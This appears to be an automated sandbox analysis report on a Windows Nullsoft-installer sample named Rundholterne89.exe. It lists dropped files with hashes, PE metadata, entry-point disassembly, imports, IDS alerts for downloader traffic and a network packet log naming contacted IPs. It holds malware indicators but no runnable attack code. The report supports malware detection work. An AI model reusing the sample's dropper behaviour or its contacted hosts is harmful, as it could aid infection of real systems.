                                                                                          Preview:beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:GTA audio index data (SDT)
                                                                                          Category:dropped
                                                                                          Size (bytes):339224
                                                                                          Entropy (8bit):3.2329059465811363
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
                                                                                          MD5:2AFAF6367CF5833A8885999FEFA5B44A
                                                                                          SHA1:58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
                                                                                          SHA-256:66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
                                                                                          SHA-512:A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
                                                                                          Malicious:false
                                                                                          Preview:........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):91155
                                                                                          Entropy (8bit):3.2484639775571122
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
                                                                                          MD5:55DD84338306B8F361571D07E3D03F25
                                                                                          SHA1:5F086147B0ED6D4CBE40B6F81C1003EB07714B94
                                                                                          SHA-256:016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
                                                                                          SHA-512:045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
                                                                                          Malicious:false
                                                                                          Preview:....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):411197
                                                                                          Entropy (8bit):3.2412073600303604
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
                                                                                          MD5:9548F6F7A71852794789DE0AC5FDE451
                                                                                          SHA1:74C915E2C9C110929FD87C907BE17930B0B66B24
                                                                                          SHA-256:2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
                                                                                          SHA-512:0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
                                                                                          Malicious:false
                                                                                          Preview:....u*...........................*................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
                                                                                          Category:dropped
                                                                                          Size (bytes):15845
                                                                                          Entropy (8bit):7.693658939604953
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
                                                                                          MD5:762778DFE1B62D3430B44A32AEDC03E0
                                                                                          SHA1:7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
                                                                                          SHA-256:9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
                                                                                          SHA-512:B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
                                                                                          Malicious:false
                                                                                          Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0
                                                                                          Process:C:\Users\user\Desktop\Rundholterne89.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):340868
                                                                                          Entropy (8bit):7.658610751329724
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HP+VoRJRmCwM6PiJ5JsAPmxI26uHwKZUu36NbST5CFgX29:UoR/m9PiJ5Js5xhFwKZMNy0gG9
                                                                                          MD5:D3086578D45D821207EAC6CBB8E24A2B
                                                                                          SHA1:0772CBCE5403EDAE1AAB6310B2F58D7F99C726C0
                                                                                          SHA-256:E856FC4F6B157E7799C1AF872064CD1BE9F982B1A5D18D7B16E5C3A48E3A1B1A
                                                                                          SHA-512:7DB853BECC19B209C0534C8F09635C55DAB9BC540BD138054C2E84BBFC396BFA587BD4549A7188824F95271C04894BB7C66795F75267BCA16620BC27ED38807D
                                                                                          Malicious:false
                                                                                          Preview:.BB......................^^.........................................ZZZZ...lll.....u......CCC......777777.....................................|.....................PPPPP........A....w..$$...00.c.>........................{{{{.````..........S.8..kk...q..........................H......V..p.................A..........................~......?...[[[............E............................ooooo...........%%.........p....8.................VV....I....k..............UUUU......"..&....v..........hh.....b.............q.....................=.....gg..............._.<<..QQQ.............Y.................p...............22...............XX...................................aa...........V.............)... .........c."...........a...^^^........ww...pp.............JJJ....................mm....{.>>.xx.......~~~.............WW........................................E.^.....c....:...L....1.......................+.............///...a....................<.F......M.22........l...............2.__..............
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.7193229791674485
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:Rundholterne89.exe
                                                                                          File size:891'148 bytes
                                                                                          MD5:a1e239c4d5116e289ce0597a92844ede
                                                                                          SHA1:4562d452ccc32512291c3165a0b9b3c076b28094
                                                                                          SHA256:1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
                                                                                          SHA512:500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
                                                                                          SSDEEP:24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
                                                                                          TLSH:8C152286F764DDB7E831527010BEA932E1716C728161920737A97F7A883373E0D4B6CA
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
                                                                                          Icon Hash:4ccc524656d64e01
                                                                                          Entrypoint:0x40310f
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                                          Instruction
                                                                                          sub esp, 00000184h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          xor ebx, ebx
                                                                                          push 00008001h
                                                                                          mov dword ptr [esp+18h], ebx
                                                                                          mov dword ptr [esp+10h], 00409198h
                                                                                          mov dword ptr [esp+20h], ebx
                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                          call dword ptr [004070A8h]
                                                                                          call dword ptr [004070A4h]
                                                                                          cmp ax, 00000006h
                                                                                          je 00007F880CDD9FD3h
                                                                                          push ebx
                                                                                          call 00007F880CDDCF41h
                                                                                          cmp eax, ebx
                                                                                          je 00007F880CDD9FC9h
                                                                                          push 00000C00h
                                                                                          call eax
                                                                                          mov esi, 00407298h
                                                                                          push esi
                                                                                          call 00007F880CDDCEBDh
                                                                                          push esi
                                                                                          call dword ptr [004070A0h]
                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                          cmp byte ptr [esi], bl
                                                                                          jne 00007F880CDD9FADh
                                                                                          push ebp
                                                                                          push 00000009h
                                                                                          call 00007F880CDDCF14h
                                                                                          push 00000007h
                                                                                          call 00007F880CDDCF0Dh
                                                                                          mov dword ptr [0042E404h], eax
                                                                                          call dword ptr [00407044h]
                                                                                          push ebx
                                                                                          call dword ptr [00407288h]
                                                                                          mov dword ptr [0042E4B8h], eax
                                                                                          push ebx
                                                                                          lea eax, dword ptr [esp+38h]
                                                                                          push 00000160h
                                                                                          push eax
                                                                                          push ebx
                                                                                          push 00428828h
                                                                                          call dword ptr [00407174h]
                                                                                          push 00409188h
                                                                                          push 0042DC00h
                                                                                          call 00007F880CDDCB37h
                                                                                          call dword ptr [0040709Ch]
                                                                                          mov ebp, 00434000h
                                                                                          push eax
                                                                                          push ebp
                                                                                          call 00007F880CDDCB25h
                                                                                          push ebx
                                                                                          call dword ptr [00407154h]
                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75340xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x1aa58.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x5fdd0x600038462d04cfdbc4943d18be461d53cc3eFalse0.6783854166666666data6.499697507009752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x70000x13520x14003d134ae5961af9895950a7ee0adc520aFalse0.4583984375data5.207538993430304IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x90000x254f80x6002d00401e0c64d69b6d0ccb877d9f624eFalse0.4544270833333333data4.0323505938358934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .ndata0x2f0000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x420000x1aa580x1ac00098718c0c5bf54afe6e125c2f1ac35baFalse0.23448452102803738data3.706045365348602IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_BITMAP0x424600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                          RT_ICON0x427c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.09021944871643203
                                                                                          RT_ICON0x52ff00x32f2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9443336911516639
                                                                                          RT_ICON0x562e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.16089211618257263
                                                                                          RT_ICON0x588900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.18738273921200752
                                                                                          RT_ICON0x599380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.31050106609808104
                                                                                          RT_ICON0x5a7e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.440884476534296
                                                                                          RT_ICON0x5b0880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5635838150289018
                                                                                          RT_ICON0x5b5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.2703900709219858
                                                                                          RT_ICON0x5ba580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.21908602150537634
                                                                                          RT_ICON0x5bd400x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.3716216216216216
                                                                                          RT_DIALOG0x5be680x144dataEnglishUnited States0.5216049382716049
                                                                                          RT_DIALOG0x5bfb00x13cdataEnglishUnited States0.5506329113924051
                                                                                          RT_DIALOG0x5c0f00x100dataEnglishUnited States0.5234375
                                                                                          RT_DIALOG0x5c1f00x11cdataEnglishUnited States0.6056338028169014
                                                                                          RT_DIALOG0x5c3100xc4dataEnglishUnited States0.5918367346938775
                                                                                          RT_DIALOG0x5c3d80x60dataEnglishUnited States0.7291666666666666
                                                                                          RT_GROUP_ICON0x5c4380x92dataEnglishUnited States0.6575342465753424
                                                                                          RT_VERSION0x5c4d00x248dataEnglishUnited States0.5308219178082192
                                                                                          RT_MANIFEST0x5c7180x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                                          DLLImport
                                                                                          KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                          USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                          ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-10-22T16:04:14.198153+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049709142.250.185.174443TCP
                                                                                          2024-10-22T16:04:19.358399+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049711193.122.130.080TCP
                                                                                          2024-10-22T16:04:20.811576+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049711193.122.130.080TCP
                                                                                          2024-10-22T16:04:21.520222+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049713188.114.97.3443TCP
                                                                                          2024-10-22T16:04:22.249021+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049714193.122.130.080TCP
                                                                                          2024-10-22T16:04:22.954475+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049715188.114.97.3443TCP
                                                                                          2024-10-22T16:04:26.027860+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049719188.114.97.3443TCP
                                                                                          2024-10-22T16:04:28.905367+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049723188.114.97.3443TCP
                                                                                          2024-10-22T16:04:31.792925+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049727188.114.97.3443TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 22, 2024 16:04:12.902620077 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:12.902672052 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:12.902757883 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:12.913573980 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:12.913589001 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:13.773917913 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:13.773994923 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:13.775017977 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:13.775080919 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:13.827322006 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:13.827351093 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:13.827816963 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:13.827873945 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:13.829560995 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:13.871364117 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:14.198174953 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:14.198261023 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:14.198398113 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:14.198436022 CEST44349709142.250.185.174192.168.2.10
                                                                                          Oct 22, 2024 16:04:14.198479891 CEST49709443192.168.2.10142.250.185.174
                                                                                          Oct 22, 2024 16:04:14.232996941 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:14.233042955 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:14.233189106 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:14.233568907 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:14.233589888 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:15.098956108 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:15.099041939 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:15.103468895 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:15.103483915 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:15.103863001 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:15.103916883 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:15.104291916 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:15.151323080 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.693398952 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.693504095 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.702198982 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.702264071 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.811713934 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.811849117 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.811996937 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.812033892 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.812089920 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.812112093 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.812195063 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.812201023 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.812287092 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.816566944 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.816629887 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.816637993 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.816679001 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.825105906 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.825174093 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.825182915 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.825227976 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.833801985 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.833874941 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.833884001 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.833924055 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.842605114 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.842669964 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.842695951 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.842750072 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.842784882 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.842833996 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.851305962 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.851397991 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.851422071 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.851469040 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.860047102 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.860150099 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.860192060 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.860239029 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.869028091 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.869095087 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.869116068 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.869155884 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.930668116 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.930811882 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.930841923 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.930895090 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.930902004 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.930941105 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.930948019 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.930983067 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.931032896 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.931087971 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:17.931355953 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:17.931410074 CEST49710443192.168.2.10142.250.186.65
